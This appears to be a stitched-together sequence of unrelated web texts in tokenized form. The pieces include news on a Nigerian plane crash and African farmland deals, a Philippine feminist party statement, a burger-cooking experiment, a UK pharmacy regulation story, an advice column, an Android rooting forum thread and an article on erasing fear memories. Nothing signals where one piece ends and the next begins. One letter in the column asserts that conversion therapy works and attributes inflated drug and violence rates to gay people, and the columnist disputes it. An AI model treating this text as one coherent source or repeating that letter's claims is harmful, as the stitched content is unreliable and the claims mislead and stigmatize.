A Nigerian plane taking part in an exercise aimed at testing disaster response operations has crashed in the southern oil city of Port Harcourt .
The air force plane - carrying dozens of officials - skidded off the runway as it was landing at the city 's international airport .
Emergency workers on the ground who had been preparing to stage a mock rescue had to deal with a real accident .
The passengers and crew escaped with only minor injuries .
" No life was lost but the aircraft was severely damaged , " police spokeswoman Rita Inoma - Abbey was quoted as saying by Reuters news agency .
A Socialist Dialogue forum was held in the Philippines on March 6 , 2010 , entitled " Women and revolution : Renewing socialist feminism today " .
See the slides for the presentation above .
The notes can be found HERE .
Socialist Dialogue
Statement by Partido Lakas ng Masa
March 8 , 2010 --
In the Philippines poor children die at three times the rate of the children of the rich , according to latest UN data .
Under - five mortality rates are 66 child deaths to every 1000 live births among the poor , compared to 21 child deaths to every 1000 births among the rich .
The largest wealth disparity for under - five mortality rates is in the Philippines , compared to any other country in the Asia - Pacific region .
Child mortality is linked to the health and welfare of mothers .
Maternal mortality rates in the Philippines show little or no improvement and are unlikely to meet even the " less than minimum " Millennium Development Goals .
If there is one single reason that we need a comprehensive , modern reproductive health bill and reproductive health program meeting international best standards and practice , this is it .
A reproductive health program , which is free and accessible to poor women , which gives mothers a range of choices and educates them about these choices , saves poor children ’s lives .
Every issue today , big and small , is a women ’s issue .
Poverty and the economic crisis , job losses and contractualisation , health care and reproductive health , education , oil prices , corruption , governance , the illegitimate debt , war , militarism , violence , climate change and the environmental crisis – these are all women ’s issues .
After all , women are the ones who tend to be the hardest hit by these issues – from the economic crisis , during which a majority of workers laid off in industries such as electronics are women , to climate - change induced disasters such as flooding , where the casualty rates tend to be higher for women and children .
So how society is organised and in whose interests ?
Who controls the political system ?
Who runs the economy ?
These are all issues that are extremely important to women .
These are , in fact , life and death issues for women .
In the Philippines , we have supposedly progressed on gender and governance issues : we elect women presidents and have one of the highest proportions of women in [ parliament ] , compared to other countries in the region .
And yet this has not translated into concrete gains for a majority of working and poor women .
The system of elite rule that exploits and oppresses working and poor women is still in place .
Women have entered the " master 's house " – Congress and government – but instead of throwing out the master , bringing down his house and building a new home for all , these women represent the master ’s interests , i.e. the patriarchal system of elite rule .
So the issue is not merely one of women ’s participation , but one of genuine representation – in whose political , social and economic interests , do these women govern ?
And in the coming May 10 national elections there is no indication that any of these women ’s issues will be seriously addressed .
None of the major presidential aspirants represent women ’s interests .
And this is not because there are no women candidates running for higher office on these tickets .
In fact there are several women candidates running for higher office , but a majority of them do not represent the interests of women in this country , i.e. the interests of the women workers , of urban and rural poor women , of the masses of labouring women .
A majority of these women candidates represent trapo [ traditional capitalist ] politics and the system of elite rule that governs the political and economic system in this country .
We think that only a government of the masang kababaihan ( women masses ) can genuinely advance the interests of a majority of women .
Such a government can only come about through the active mobilisation of hundreds and thousands of women , uncompromisingly demanding their rights and being prepared to go all the way to win these rights , up against and beyond the system of trapo politics and elite rule .
Therefore , on this International Women ’s Day , the Partido Lakas ng Masa puts out the call for Gobyerno ng Masang Kababaihan para sa Sosyalista - Feministang Lipunan !
( A government of the women masses and for a socialist feminist society ) .
Get the Recipe Thick and Juicy Burgers
Juicy Burgers
Want to keep the juice in the meat ?
Thick Juicy Burgers Right This Way ! »
A friend — who for some odd reason trusts my musical advice , or at least pretends to — asked me a question about the great Who number " Pinball Wizard " the other day , and as always happens when I think about that song , the best line got stuck in my head for a good three days .
There 's something about the image of a kid who 's " got crazy flipping fingers " that 's just funny to me .
All this has nothing to do with burgers , other than the " crazy flipping " part .
I posed a simple question on my Facebook page the other day :
When cooking a burger , how many times do you flip it ?
As you can imagine , the responses fell overwhelmingly into the " single flip " camp .
It seems that so - called " nervous flipper " — you know , the backyard griller who , like a chimp at the Bronx Zoo , ca n't seem to leave his meat alone — have a bad rap in the food world .
Some commenters even went so far as to resort to ALL CAPS : " How can you even ask this question ?
ONE FLIP ! "
Yikes !
Well , I 've always been of the mind that if an answer exists — and clearly , there is an answer to this — then the question is worth asking .
Fortunately , this question is one that 's fairly straightforward to test .
Those on the " one flip " side ( 22 out of every 23 people , according to my Facebook data ) , claim " more even cooking , " and " better flavor development , " as the selling points of the method .
Curiously , the few people on the " multiple flips " side ( which , incidentally , has some heavy - hitting supporters including Harold McGee himself ) claim the exact same benefits from multiple flips , adding in " shortened cooking time " to the mix .
So who 's right ?
Will Flip For Data
To test this , I formed a dozen 1/2 - pound burgers into equal - sized patties * , seasoned them just before cooking with an equal amount of kosher salt and black pepper , then seared them in a steel skillet pre-heated to 450 °F ( which I temped with an infrared thermometer before adding the patties ) .
The ambient air in the kitchen was at an unbearably hot 76 °F ( my Colombian wife was home , and thus the heating was on full blast ** ) .
Each patty was cooked to an internal temperature of 125 °F , and was then rested for five minutes at room temperature before being autopsied for examination .
* The theories tested here only apply to thick burgers — thin patties are an entirely different beast .
** Are you all tired of hearing about her yet ?
I apologize .
We both work from home , so we do n't get to see much of the real world .
A scale and ruler were used to collect data on moisture loss , external browning characteristics , and internal cooking pattern , while the overall degree of pleasure contained within each patty was ascertained via a standard oral mastication assay ( aka , eating it ) .
The only variable in cooking was the number of times the patty was flipped , ranging from once every three and a half minutes ( resulting in a single flip during cooking ) , down to one flip every 15 seconds .
Surface Browning
Can you spot the difference between these two burgers ?
I have trouble too .
Those of you who knew where Waldo was as a kid probably noticed that the patty on the right — the one - flipper — has a slightly more distinct searing on the top , while the sides remain relatively uncolored .
The patty on the left — flipped every fifteen seconds — has a top that 's a tiny bit less colored , but is more evenly browned all the way around the edges .
Overall , the total amount of browning seems pretty close to equal .
The interesting part , however , is that the patty on the left took about 2 minutes less time to reach an internal temperature of 125 °F than the patty on the right — a time savings of nearly one - third !
Why is this ?
It 's because when cooking via a single flip , as you flip the burger over , the second side will be barely any warmer than it was when the whole patty first went into the skillet .
Your cooking time is only half way done .
As you add more flips , on the other hand , what you are essentially doing is approximating cooking both sides of the burger simultaneously , albeit on a slightly lower - heat surface .
When you flip the patty , little enough time passes that the upward - facing side barely loses any heat to the outside environment .
The end result is that while each individual side takes slightly longer to cook , because they are cooking simultaneously , the overall cooking time is shorter .
Neat .
Weighing the patties revealed that moisture loss was pretty much at a consistent 17 - 19 % across the board for all patties concerned , with no trends linked to number of flips .
Now hand me my scalpel , It 's time take a look inside .
The Autopsies
This burger was only flipped once .
As you can clearly see , it consists of a good 3/8 - inch of dry , overcooked meat at bottom , followed by 5/8 - inch of rosy pink , medium - rare center , a topped with another 1/4 - inch of dry , overcooked meat .
It 's not a horrible burger , by any means , and I would n't send it back , but surely we can do better than this , right ?
Now here 's the burger that was flipped every fifteen seconds .
It appears slightly more well done than the previous burger ( I 'm guessing I misjudged the center of the burger when temping the first one ) .
The interesting thing to note , however , is not the overall doneness of the meat , but the differential between the most cooked parts , and the least cooked parts — in particular , to the amount of overcooked meat around the edges .
In this patty , the amount of dessicated , well - done meat on the top and bottom is limited to just about 3/16 - inch around the outer edge — that 's 40 % less overcooked meat than the first one , and the burger cooked in just two - thirds of the time !
Charting the ratio of overcooked meat to the overall burger for various amounts of flipping , you get this :
So , according to empirical data alone , the multi-flippers are right !
And how did they taste ?
Well , to be honest , there was n't a huge difference between any of them .
I would be very hard pressed to put them in the correct order , or even pick out the best and worst if I were blind - folded .
Although of course , this testing does n't take into account variables like cooking at a higher or lower heat , getting nice grill marks on an outdoor grill , or the fact that unless you 've got eight arms , manning a grill full of burgers at the backyard BBBQ *** is a pretty tall order .
*** The extra " B " is for " BYOBB "
Moral of the story ?
All you supple - wristed crazy flippers out there , do n't worry : you 're doing the right thing .
And for all you single flippers out there ?
Well , you can keep doing what you 're doing and it probably wo n't hurt your burgers none , but lighten up a bit , will ya ?
My real question now : is it possible to do better ?
Could I produce a burger that has almost no overcooked meat at all ?
On the Flip Side
The meat you are looking at has not gone off .
It is in fact , a perfectly cooked , juicy , and succulent patty .
So why does it look so horrible ?
I 'll get there .
Thinking back to past experiments I 've done with prime rib , I knew that cooking burgers , as with cooking any meat , is an eternal struggle between maintaining a low temperature in the interior , and hot temperature on the outside .
Allow myself to quote ... myself :
125 °F ( or 51.7 °C ) is the temperature at which beef is medium rare — that is , hot but still pink , cooked but still moist and able to retain its juices .
Any higher than that , and muscle fibers start to rapidly shrink , forcing flavorful juices out of the meat , and into the bottom of the roasting pan .
is the temperature at which beef is medium rare — that is , hot but still pink , cooked but still moist and able to retain its juices .
Any higher than that , and muscle fibers start to rapidly shrink , forcing flavorful juices out of the meat , and into the bottom of the roasting pan .
310 °F ( or 154.4 °C ) is the temperature at which the Maillard reaction — that wonderfully complicated process by which amino acids and reducing sugars recombine to form enticing roasty aromas — really begins to take off .
At this range , meat will quickly brown and crisp .
And so it is with a ground beef patty as well .
Once that realization was made , it was a quick step to discover that cooking a burger is just like cooking a roast on a small scale : to maximize the degree of medium rare center , you must first cook it in a low temperature oven ( around 200 to 225 °F ) .
Once it is cooked to within about 10 degrees of your desired finishing temperature , pull the gray mass out of the oven ( incidentally , the exterior is gray because of oxidation reactions hastened by the warm air in the oven — not because it is overcooked ) , simply sear it in a ripping hot skillet to color the outside , and you 're done .
By allowing it to first cook in the oven , the exterior dessicates a bit , and goes into the skillet warm , greatly decreasing the amount of time it needs to achieve good coloring — from about 2 to 3 minutes per side to about 45 seconds per side — thus reducing the amount of overcooked meat under the surface .
As you can see , the layer of overcooked meat is all but eliminated .
The result is a burger of unparalleled succulence .
I 'm more of a thin , pressed burger guy myself , but here 's one thick burger that I might actually enjoy .
Loath to heat up the oven for a burger ?
Well , unfortunately , you gotta pay your dues if you want to sing the blues .
Besides , I 'd easily argue that the oven actually cuts down on the amount of work you need to do .
Since most of the cooking gets done in the oven and searing time is minimized , I 've found that clean up is a easier , you get a little less beefy odor hanging in the air , and your wife will love you a little bit more .
( I can come back to my apartment after a week long vacation and wonder whose opened up a burger shop inside — the odor lingers that long ) .
The best part ?
The number of burgers you can cook simultaneously is limited only by how many you can fit on a sheet tray ( they can be seared off in batches after baking ) .
So easy that even that deaf , dumb , and blind kid could sure make a mean meat ball .
Ugh .
Really sorry about that .
Still stuck in my head .
Continue here for Thick and Juicy Burgers »
Get the Recipe Thick and Juicy Burgers View Recipe »
All products linked here have been independently selected by our editors .
We may earn a commission on purchases , as described in our affiliate policy .
Customers could be told of alternative shops under the new plans Pharmacists across the UK have been told they can continue to refuse to prescribe items that might clash with their personal religious beliefs .
A revised code of conduct from the new industry regulator will allow staff to opt out of providing items such as the morning - after pill and contraception .
But they may in future have to give customers details of alternative shops .
The National Secular Society wanted the General Pharmaceutical Council to scrap the so - called conscience clause .
The General Pharmaceutical Council ( GPhC ) is to take over the regulation of pharmacists , pharmacy technicians and the registration of pharmacy premises from the Royal Pharmaceutical Society later this year .
ANALYSIS John McManus , BBC Religious Affairs producer I have been told that the so - called " conscience clause " is only used by a very small number of pharmacists who feel their religious beliefs would be undermined by giving out contraception .
Similarly , doctors have long been able to both turn down training in abortion procedures , or carry them out , if they have ethical objections .
Yet critics argue that even pharmacists working for private retail chains are providing a public service , often in conjunction with local GPs and hospitals , and should be ready to put their own objections to one side .
The new regulator says it is aware that the clause can be controversial , which is why it will consult more widely on the issue later in the year .
And the Royal Society of Pharmacists insist that members who " opt- out " of providing services must consider what effect their actions may have on a patient .
For now though , there is still a chance that members of the public wanting various forms of contraception could be turned away by their local chemist .
Read a selection of comments
Under its new code , pharmacists with strong religious principles will still be able to continue to refuse to sell or prescribe products if they feel that doing so would contradict their beliefs .
But the GPhC says pharmacists who refuse services could be obliged to tell patients where they can access them and it plans to consult more widely on the issue .
Terry Sanderson , president of the National Secular Society , said he was disappointed by the code .
" This was a perfect opportunity to severely restrict the exercise of this supposed conscience clause which has caused a great deal of embarrassment and inconvenience to people recently .
" It seems incredible that pharmacists can arbitrarily tell people that they wo n't serve them with medication that has been prescribed by a doctor . "
The issue was highlighted recently by a woman denied the pill by a Sheffield chemist .
She was told to return to the shop the following day when another staff member would be on duty .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
The following e-mails are actual letters from my inbox .
They are posted here verbatim , with no edits .
My comments are in italics .
If you would like to contact me , please write to stuffqueerpeopleneedtoknow@gmail.com .
Dear Jamie ,
Close to Christmas , which commemorates the birth of Jesus , actor Chuck Norris has leashed out against Obama ’s health reform .
In a column published by World Net Daily entitled “ What if Mother Mary had Obamacare ? ” Norris states : Mary , as a poor adolescent would have received help and assistance through Family Planning in order to stop her pregnancy .
Therefore , Baby Jesus would not have been born and … “ what then would have been the fate of the world ? ”
He also regrets Obama ’s policy in favour of abortion when so many Americans , he says , are against abortion .
In the USA the pro-life tendency has reached its highest peak in decades in 2009 .
Abortion is becoming increasingly unacceptable .
Isabel Planas
If Mary had the right to choose , I do n’t know what she would have done .
She probably would have kept the baby , as abortion procedures were extremely dangerous 2,000 years ago and involved ingesting mercury or other harmful substances .
But if Mary had universal health care , you had better believe she would n’t have given birth in a manger .
Dear Jamie ,
What Research Shows , a study published by the National Association for Research and Therapy of Homosexuality based on over one hundred years ’ experience derived from clinical studies and research , proves that it is possible for men and women to diminish their unwanted homosexual attraction and to develop their heretosexual potential without suffering any harm .
This is a very convenient fact as the homosexuals ’ experiences and risk factors related to medical pathology and of psychological origin or arising from relationships are much greater than for the population as a whole .
In spite of AIDS , homos continue practicing unsafe sex , being the group with the highest rate of sexually transmitted diseases .
It is a fact that over one third homosexuals are drug addicts and 40 % of teenager homos report suicide attempts .
Also , the number of mental disorders suffered by homosexuals is higher than for heterosexuals : eating disorders andpersonality disorders such as paranoia , depression and anxiety .
Also , homosexual relationships are especially violent .
NARTH , according to 600 clinical reports concluded that the sexual reorientation treatment was successful in many cases for many individuals who experienced unwanted behaviour / homosexual attraction but who had a positive approach , as a result of therapy or religious assistance .
From an ethical point of view , psychologists and psychiatrists must provide psycho-educational and therapeutic assistance to those gays and lesbians wanting a change of direction in their sexual orientation .
Pili Montalban
Any pathologization of a social construction is very dangerous .
The LGBTQQIA identities are defined and stigmatized by society at large .
Because of this , queers think they are wrong because who they are is not accepted by society .
If the LGBTQQIA identities were accepted , they would n’t want to be cured .
Homos are n’t the cause of the spread of AIDS ; abstinence - only education and lacking access to contraception is the cause .
And , actually , it is not a fact that one - third of homosexuals are drug addicts ; however , it is a fact that one - third of teen suicides are committed by gay teens .
This is because being a gay teen is an extremely hard life , as 9 out of 10 report being bullied .
And just so we ’re clear , NARTH is a rogue band of psychiatrists and psychologists that treat homosexuality as a mental illness against the Diagnostic and Statical Manual of Mental Disorders , the official guide for mental health professionals , and the American Psychiatric Association .
** SOLVED ** Consolidated Info to HOPEFULLY Root Rogers 3.05.631.7 ROM - updating via RUU
UPDATE !!
** SOLVED ** April 25 , 2010
** Not Successfully Rooted : Feb. 2 , 2010 ( AFAIK )
Please post what you 've tried in attempting to again obtain root , your failures and hopefully successes .
Cant ' back up Recovery.img Error( Tried clicking the hidden Star next to " Back Up Recovery " and skipping this step ... and just flashing recovery - RA - sapphire - v1.5.2H.img .
Did n't work either ) Tried with Amon_RA
Hero recovery.img also , without success .
RUU would not let me proceed because the ROM was older than the one installed .
Attempted several times both with and without a goldcard installed .
Will see the device , initially , but a command of " adb remount " kills the connect .
same with " adb root "
Error -
Does not allow access
No luck obtaining root
With one GoldCard getting Update Fail error that SAPPIMG is older than one installed .
When trying the other GC , get Update Fail Error that Model ID is incorrect .
RUU would not let me proceed because the ROM was older than the one installed or Device ID was wrong .
Attempted several times both with and without a goldcard installed .
RUU would not let me proceed because the ROM was older than the one installed or Device ID was wrong .
Attempted several times both with and without a goldcard installed .
RUU would not let me proceed because the ROM was older than the one installed or Device ID was wrong .
Attempted several times both with and without a goldcard installed .
Download new RUUFlash with Goldcard method http://theunlockr.com/2010/03/10/how...te-a-goldcard/
1 . Download RUU linked above .
2 . Install update using RUU.3 .
Turn on phone and connect to computer .
4 .
Get RA recovery and SPL also linked above and drop them to sdcard root directory .
5. Run SDK : adb shell6 .
Install recovery : flash_image recovery / sdcard / recovery - RA-hero-v1.6.2.img http://forum.xda-developers.com/showthread.php?t=561124
6 . Turn off phone and turn on again holding Power + Home .
RA Recovery should appear .
7 .
Flash zip from sdcard .
8 .
Use file : update - hboot - 1762007 - signed9 .
Done .
PSPL broken .10 .
Build a shrine for orange_24**************************************************
** I decided to start this thread because the info for again obtaining root , for those of us dumb enough to update to the official Rogers ROM 3.05.631.7 via the RUU , is all over the place in about a million different threads .
My hope is that we can organize it all in 1 place .
At this point , yes , we all know we were impatient and newbs and everything else .
Ok , lesson learned .
So , lets move forward and try to get this thing rooted .
If you are a developer who has the talent to help root this ROM and have lost interest in the Magic or moved on to the Nexus One or Droid , we ask that you please try to spend a few moments on this and help out those of us who are really stuck here .
Personally , I 'm getting pretty desperate and thinking of even replacing the phone .** EDITI 've probably tried a few more methods to obtain root .
Those were all fails , too .
I 'll post the links , as well , when I find them again .
Hopefully this thread will lead us all in the right direction .
Here is the link to the same topic in the HTC Dream Forum - in case they find out something that might help us out : http://forum.xda-developers.com/showthread.php?t=625732
We knew Android 2.1 was coming for the Droid , but we 'll confess -- we did n't expect it to come this soon .
Motorola is now reporting via its official Facebook page that it's " happy to relay the 2.1 upgrade to Droid will start to roll out this week , " going on to tease that it " will have more information to share on other device upgrades later . "
There 's no detail on what the Droid update will entail or whether it 'll roll out to every user this week ( we doubt it ) , but by all indications , this is a promising sign that Moto 's keeping the pedal to the metal , we 'd say .
[ Thanks , andrewcweaver ]
Where does it end ?
100 billion ?
1 trillion ?
1 quadrillion ?
And yes America , this is your money , going to bail out Greece ...
Then Portugal ...
Then Ukraine .... Then Dubai .... Then Italy .... Then Spain .... Then Hungary .... Then the Baltics ... Then the UK .... Then Japan ... and by the time we have to bail ourselves out , there will be nothing left , except the Turbo Bernanke 3000 dry heaving with an empty ink cartridge and empty paper cart , while gold oz will be worth one quadrillion Benjamins ( or is that Bernankes ) .
In the meantime , as Erik Nielsen , who finally woke up , predicted , the final bailout cost of Greece alone will be € 150 billion .
So the IMF will do rookie mistake 101 and keep raising the bailout requirement incrementally , even as the depositor runs on Greek banks and the ongoing strikes and riots , destroy the country ...
But at least in the meantime the dollar will get devalued and Wells - JPM - BofA / REIT investors will be happy .
From the FT :
An Observer investigation reveals how rich countries faced by a global food shortage now farm an area double the size of the UK to guarantee supplies for their citizens
We turned off the main road to Awassa , talked our way past security guards and drove a mile across empty land before we found what will soon be Ethiopia 's largest greenhouse .
Nestling below an escarpment of the Rift Valley , the development is far from finished , but the plastic and steel structure already stretches over 20 hectares – the size of 20 football pitches .
The farm manager shows us millions of tomatoes , peppers and other vegetables being grown in 500 m rows in computer controlled conditions .
Spanish engineers are building the steel structure , Dutch technology minimises water use from two bore - holes and 1,000 women pick and pack 50 tonnes of food a day .
Within 24 hours , it has been driven 200 miles to Addis Ababa and flown 1,000 miles to the shops and restaurants of Dubai , Jeddah and elsewhere in the Middle East .
Ethiopia is one of the hungriest countries in the world with 2.8 million people needing food aid , but paradoxically the government is offering at least 3 m hectares of its most fertile land to rich countries and some of the world 's most wealthy individuals to export food for their own populations .
The 1,000 hectares of land which contain the Awassa greenhouses are leased for 99 years to a Saudi billionaire businessman , Ethiopian - born Sheikh Mohammed al - Amoudi , one of the 50 richest men in the world .
His Saudi Star company plans to spend up to $ 2bn acquiring and developing 500,000 hectares of land in Ethiopia in the next few years .
So far , it has bought four farms and is already growing wheat , rice , vegetables and flowers for the Saudi market .
It expects eventually to employ more than 10,000 people .
But Ethiopia is only one of 20 or more African countries where land is being bought or leased for intensive agriculture on an immense scale in what may be the greatest change of ownership since the colonial era .
An Observer investigation estimates that up to 50 m hectares of land – an area more than double the size of the UK – has been acquired in the last few years or is in the process of being negotiated by governments and wealthy investors working with state subsidies .
The data used was collected by Grain , the International Institute for Environment and Development , the International Land Coalition , ActionAid and other non-governmental groups .
The land rush , which is still accelerating , has been triggered by the worldwide food shortages which followed the sharp oil price rises in 2008 , growing water shortages and the European Union 's insistence that 10 % of all transport fuel must come from plant - based biofuels by 2015 .
In many areas the deals have led to evictions , civil unrest and complaints of " land grabbing " .
The experience of Nyikaw Ochalla , an indigenous Anuak from the Gambella region of Ethiopia now living in Britain but who is in regular contact with farmers in his region , is typical .
He said : " All of the land in the Gambella region is utilised .
Each community has and looks after its own territory and the rivers and farmlands within it .
It is a myth propagated by the government and investors to say that there is waste land or land that is not utilised in Gambella .
" The foreign companies are arriving in large numbers , depriving people of land they have used for centuries .
There is no consultation with the indigenous population .
The deals are done secretly .
The only thing the local people see is people coming with lots of tractors to invade their lands .
" All the land round my family village of Illia has been taken over and is being cleared .
People now have to work for an Indian company .
Their land has been compulsorily taken and they have been given no compensation .
People cannot believe what is happening .
Thousands of people will be affected and people will go hungry . "
It is not known if the acquisitions will improve or worsen food security in Africa , or if they will stimulate separatist conflicts , but a major World Bank report due to be published this month is expected to warn of both the potential benefits and the immense dangers they represent to people and nature .
Leading the rush are international agribusinesses , investment banks , hedge funds , commodity traders , sovereign wealth funds as well as UK pension funds , foundations and individuals attracted by some of the world 's cheapest land .
Together they are scouring Sudan , Kenya , Nigeria , Tanzania , Malawi , Ethiopia , Congo , Zambia , Uganda , Madagascar , Zimbabwe , Mali , Sierra Leone , Ghana and elsewhere .
Ethiopia alone has approved 815 foreign - financed agricultural projects since 2007 .
Any land there , which investors have not been able to buy , is being leased for approximately $ 1 per year per hectare .
Saudi Arabia , along with other Middle Eastern emirate states such as Qatar , Kuwait and Abu Dhabi , is thought to be the biggest buyer .
In 2008 the Saudi government , which was one of the Middle East 's largest wheat - growers , announced it was to reduce its domestic cereal production by 12 % a year to conserve its water .
It earmarked $ 5 bn to provide loans at preferential rates to Saudi companies which wanted to invest in countries with strong agricultural potential .
Meanwhile , the Saudi investment company Foras , backed by the Islamic Development Bank and wealthy Saudi investors , plans to spend $ 1bn buying land and growing 7 m tonnes of rice for the Saudi market within seven years .
The company says it is investigating buying land in Mali , Senegal , Sudan and Uganda .
By turning to Africa to grow its staple crops , Saudi Arabia is not just acquiring Africa 's land but is securing itself the equivalent of hundreds of millions of gallons of scarce water a year .
Water , says the UN , will be the defining resource of the next 100 years .
Since 2008 Saudi investors have bought heavily in Sudan , Egypt , Ethiopia and Kenya .
Last year the first sacks of wheat grown in Ethiopia for the Saudi market were presented by al - Amoudi to King Abdullah .
Some of the African deals lined up are eye - wateringly large : China has signed a contract with the Democratic Republic of Congo to grow 2.8 m hectares of palm oil for biofuels .
Before it fell apart after riots , a proposed 1.2 m hectares deal between Madagascar and the South Korean company Daewoo would have included nearly half of the country 's arable land .
Land to grow biofuel crops is also in demand .
" European biofuel companies have acquired or requested about 3.9 m hectares in Africa .
This has led to displacement of people , lack of consultation and compensation , broken promises about wages and job opportunities , " said Tim Rice , author of an Action Aid report which estimates that the EU needs to grow crops on 17.5 m hectares , well over half the size of Italy , if it is to meet its 10 % biofuel target by 2015 .
" The biofuel land grab in Africa is already displacing farmers and food production .
The number of people going hungry will increase , " he said .
British firms have secured tracts of land in Angola , Ethiopia , Mozambique , Nigeria and Tanzania to grow flowers and vegetables .
Indian companies , backed by government loans , have bought or leased hundreds of thousands of hectares in Ethiopia , Kenya , Madagascar , Senegal and Mozambique , where they are growing rice , sugar cane , maize and lentils to feed their domestic market .
Nowhere is now out of bounds .
Sudan , emerging from civil war and mostly bereft of development for a generation , is one of the new hot spots .
South Korean companies last year bought 700,000 hectares of northern Sudan for wheat cultivation ; the United Arab Emirates have acquired 750,000 hectares and Saudi Arabia last month concluded a 42,000 - hectare deal in Nile province .
The government of southern Sudan says many companies are now trying to acquire land .
" We have had many requests from many developers .
Negotiations are going on , " said Peter Chooli , director of water resources and irrigation , in Juba last week .
" A Danish group is in discussions with the state and another wants to use land near the Nile . "
In one of the most extraordinary deals , buccaneering New York investment firm Jarch Capital , run by a former commodities trader , Philip Heilberg , has leased 800,000 hectares in southern Sudan near Darfur .
Heilberg has promised not only to create jobs but also to put 10 % or more of his profits back into the local community .
But he has been accused by Sudanese of " grabbing " communal land and leading an American attempt to fragment Sudan and exploit its resources .
Devlin Kuyek , a Montreal - based researcher with Grain , said investing in Africa was now seen as a new food supply strategy by many governments .
" Rich countries are eyeing Africa not just for a healthy return on capital , but also as an insurance policy .
Food shortages and riots in 28 countries in 2008 , declining water supplies , climate change and huge population growth have together made land attractive .
Africa has the most land and , compared with other continents , is cheap , " he said .
" Farmland in sub-Saharan Africa is giving 25 % returns a year and new technology can treble crop yields in short time frames , " said Susan Payne , chief executive of Emergent Asset Management , a UK investment fund seeking to spend $ 50 m on African land , which , she said , was attracting governments , corporations , multinationals and other investors .
" Agricultural development is not only sustainable , it is our future .
If we do not pay great care and attention now to increase food production by over 50 % before 2050 , we will face serious food shortages globally , " she said .
But many of the deals are widely condemned by both western non-government groups and nationals as " new colonialism " , driving people off the land and taking scarce resources away from people .
We met Tegenu Morku , a land agent , in a roadside cafe on his way to the region of Oromia in Ethiopia to find 500 hectares of land for a group of Egyptian investors .
They planned to fatten cattle , grow cereals and spices and export as much as possible to Egypt .
There had to be water available and he expected the price to be about 15 birr ( 75 p ) per hectare per year – less than a quarter of the cost of land in Egypt and a tenth of the price of land in Asia .
" The land and labour is cheap and the climate is good here .
Everyone – Saudis , Turks , Chinese , Egyptians – is looking .
The farmers do not like it because they get displaced , but they can find land elsewhere and , besides , they get compensation , equivalent to about 10 years ' crop yield , " he said .
Oromia is one of the centres of the African land rush .
Haile Hirpa , president of the Oromia studies ' association , said last week in a letter of protest to UN secretary - general Ban Ki-moon that India had acquired 1 m hectares , Djibouti 10,000 hectares , Saudi Arabia 100,000 hectares , and that Egyptian , South Korean , Chinese , Nigerian and other Arab investors were all active in the state .
" This is the new , 21st - century colonisation .
The Saudis are enjoying the rice harvest , while the Oromos are dying from man-made famine as we speak , " he said .
The Ethiopian government denied the deals were causing hunger and said that the land deals were attracting hundreds of millions of dollars of foreign investments and tens of thousands of jobs .
A spokesman said : " Ethiopia has 74 m hectares of fertile land , of which only 15 % is currently in use – mainly by subsistence farmers .
Of the remaining land , only a small percentage – 3 to 4 % – is offered to foreign investors .
Investors are never given land that belongs to Ethiopian farmers .
The government also encourages Ethiopians in the diaspora to invest in their homeland .
They bring badly needed technology , they offer jobs and training to Ethiopians , they operate in areas where there is suitable land and access to water . "
The reality on the ground is different , according to Michael Taylor , a policy specialist at the International Land Coalition .
" If land in Africa has n't been planted , it 's probably for a reason .
Maybe it 's used to graze livestock or deliberately left fallow to prevent nutrient depletion and erosion .
Anybody who has seen these areas identified as unused understands that there is no land in Ethiopia that has no owners and users . "
Development experts are divided on the benefits of large - scale , intensive farming .
Indian ecologist Vandana Shiva said in London last week that large - scale industrial agriculture not only threw people off the land but also required chemicals , pesticides , herbicides , fertilisers , intensive water use , and large - scale transport , storage and distribution which together turned landscapes into enormous mono-cultural plantations .
" We are seeing dispossession on a massive scale .
It means less food is available and local people will have less .
There will be more conflict and political instability and cultures will be uprooted .
The small farmers of Africa are the basis of food security .
The food availability of the planet will decline , " she says .
But Rodney Cooke , director at the UN's International Fund for Agricultural Development , sees potential benefits .
" I would avoid the blanket term ' land - grabbing ' .
Done the right way , these deals can bring benefits for all parties and be a tool for development . "
Lorenzo Cotula , senior researcher with the International Institute for Environment and Development , who co-authored a report on African land exchanges with the UN fund last year , found that well - structured deals could guarantee employment , better infrastructures and better crop yields .
But badly handled they could cause great harm , especially if local people were excluded from decisions about allocating land and if their land rights were not protected .
Water is also controversial .
Local government officers in Ethiopia told the Observer that foreign companies that set up flower farms and other large intensive farms were not being charged for water .
" We would like to , but the deal is made by central government , " said one .
In Awassa , the al - Amouni farm uses as much water a year as 100,000 Ethiopians .
• This article was amended on 22 March 2011 .
Owing to an editing error the original said that more than 13 million people in Ethiopia need food aid .
This has been corrected .
“ Memory ” , wrote Oscar Wilde , “ is the diary that we all carry about with us ” .
Perhaps , but if memory is like a diary , it ’s one filled with torn - out pages and fabricated passages .
In January , a group of New York University neuroscientists led by Daniela Schiller reported in the journal Nature that they had created fearful memories in people and then erased them .
Besides being rather cool , the result provides new insight into how to treat traumatic memories in people .
The research was based on the work of neuroscientist Joseph LeDoux , a coauthor on the paper .
Ten years ago , while experimenting with rats , Ledoux made a discovery that changed the way neuroscientists view memory from that of Wilde ’s tidy diary to something more along the lines of a James Frey memoir .
In that experiment , Ledoux conditioned rats to fear a bell by ringing it in time with an electric shock until the rats froze in fear at the mere sound of the bell .
Then , at the moment when the fear memory was being recalled , he injected the rats with anisomycin , a drug that stops the construction of new neural connections .
Remarkably , the next time he rang the bell the rats no longer froze in fear .
The memory , it seemed , had vanished .
Poof !
Ledoux concluded that the neural connections in which memories are stored have to be rebuilt each time a memory is recalled .
And during rebuilding — or reconsolidation , as he termed it — memories can be altered or even erased .
Neuroscientists now believe that reconsolidation functions to update memories with new information — something of an unsettling idea , suggesting that our memories are only as accurate as the last time they were remembered .
Since the discovery , scientists have been searching for ways to use similar methods to alter the fear memories that cause posttraumatic stress disorder ( PTSD ) .
This , however , has proven difficult .
Test subjects participating in research experiments are , of course , not lab rats , and scientists can’t simply inject them with drugs as they please .
But in her new paper , Schiller and her team may have discovered a noninvasive method to bring Ledoux ’s memory - erasing experiment to humans .
Psychologists have known for some time that it is difficult to treat fearful memories with therapy .
Humans , like rats , can be trained in a laboratory to fear an innocuous stimulus — a sound or a color — by pairing it with a shock .
But even after a form of laboratory therapy known as extinction training , where the stimulus is repeatedly presented without a shock to extinguish the fear , most subjects still show a rebound in the fear response a few hours later .
Similarly , PTSD patients often show symptoms after years of therapy .
In both the laboratory and on the psychologist ’s couch , trauma therapy likely fails because it simply creates new competing memories without actually altering the fear memory causing the problem .
Schiller reasoned that she might be able to make extinction training — “ lab therapy ” — more effective by triggering reconsolidation first , allowing traumatic memories to be altered with new , less fearful information .
